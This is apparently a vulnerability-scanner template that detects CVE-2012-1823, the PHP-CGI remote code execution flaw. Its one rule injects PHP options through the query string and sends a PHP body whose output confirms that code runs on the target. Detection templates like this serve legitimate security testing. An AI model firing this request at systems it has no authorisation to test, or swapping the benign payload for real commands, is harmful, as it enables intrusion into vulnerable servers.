id: CVE-2012-1823

info:
    name: PHP-CGI 远程代码执行漏洞
    author: 17bdw
    severity: critical
    verified: true
    affected: php < 5.3.12 or php < 5.4.2
    reference:
        - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823

set:
    rand: randomInt(200000000, 210000000)
rules:
    r0:
        request:
            method: POST
            path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
            body: <?php echo md5({{rand}}); ?>
        expression: response.body.bcontains(bytes(md5(string(rand))))
expression: r0()

